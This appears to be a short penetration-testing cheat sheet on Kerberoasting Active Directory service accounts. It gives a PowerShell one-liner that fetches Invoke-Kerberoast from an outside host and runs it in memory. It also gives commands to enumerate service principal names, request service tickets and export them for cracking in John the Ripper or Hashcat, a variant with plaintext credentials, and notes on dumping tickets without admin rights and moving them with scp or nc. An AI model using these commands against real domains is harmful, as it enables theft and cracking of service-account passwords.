Ticket manipulations mimi

invoke-kerberoast.ps1 automatically enumerate all service principal names in the domain, request service tickets for them, and export them in a format ready for cracking in both John the Ripper and Hashcat
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/invoke-kerberoast.ps1'); Invoke-Kerberoast -Domain 'domain.com' | fl"

Import-Module .\invoke-kerberoast.ps1 (or . .\invoke-kerberoast.ps1)
Invoke-Kerberoast -Domain 'domain.com' | fl
(-Server 'dc01.domain.com')

#with creds
$SecPassword = ConvertTo-SecureString 'Pass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('doamin\user.x', $SecPassword)
Invoke-Kerberoast -Credential $Cred -Verbose | fl

Request ticket

SPN e.g. MSSQLSvc/xor-app23.xor.com:1433 HTTP/CorpWebServer.corp.com

Dump .kirbi for kerberoast (no need admin)

use scp to transfer / nc binary / smb

With domain user pwd / hash, dump for kerberoash from kali

kerberoast to crack service ticket cleartext pwd

Last updated